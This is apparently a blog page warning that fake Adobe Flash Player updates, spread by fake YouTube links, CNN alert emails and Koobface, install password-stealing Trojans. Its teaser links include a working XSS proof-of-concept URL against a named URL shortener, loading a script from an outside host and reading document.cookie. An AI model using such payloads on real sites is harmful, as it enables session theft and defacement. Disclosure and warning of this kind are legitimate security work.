Virus developers are taking advantage of the enormous popularity of the Adobe flash player and creating fake Adobe Flash player which installs Trojan horse designed to steal password and personal information. Security experts hunting for solutions as more and more people fell to the trap of upgrading the flash player and ending up in a fake site that will install Trojan horse.

Fake YouTube links; fake CCN alert emails all tries to install the updated flash player to watch the movie. Out of curiosity to view the movie, most users simply press the upgrade button and link them selves to the hackers. Latest incident tricked the user using CNN email alerts regarding an imminent cease-fire in the Israel-Gaza conflict. Last month Koobface virus on facebook sends virus to the friends list asking them to checkout one of the latest movie. Clicking on the link directs the user to download a plug-in to watch the movie. These Trojan horse programs are designed to steal financial passwords and personal details from the victim’s computer and are very dangerous.

Wake up Adobe; we love your player but not these Trojans. Help us to get the genuine updates.

Explore More

critical XSS Vulnerability on Ygncos Shorten Url

PlanetCreator has reported another critical XSS Vulnerability on Ygncos Shorten Url : http://www.ygn.me This vulnerability has been informed to :- webmaster Test Link http://shorten.ygn.me/index.php?url=%27%22%3E%3C%2Ftitle%3E%3Cscript%20src=http://www.planetcreator.net/attacking/xss/planetcreator-xss.js%3Ealert%28document.cookie%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+PlanetCreator%3C%2Fh1%3E%3C%2Fmarquee%3E Cross-site scripting (XSS) is a type

Critical SQL Injection in mail4U is a production of Bagan Cybertech

PlanetCreator has reported another critical SQL Injection (vulnerability) on mail4U is a production of Bagan Cybertech http://www.mail4u.com.mm/ SQL injection is a code injection technique that exploits a security vulnerability occurring

How Can You Protect Yourself from Google Hacking?

The first step for protecting yourself from something is knowing how that something works. In the case of Google hacking, you will have to learn how it can be used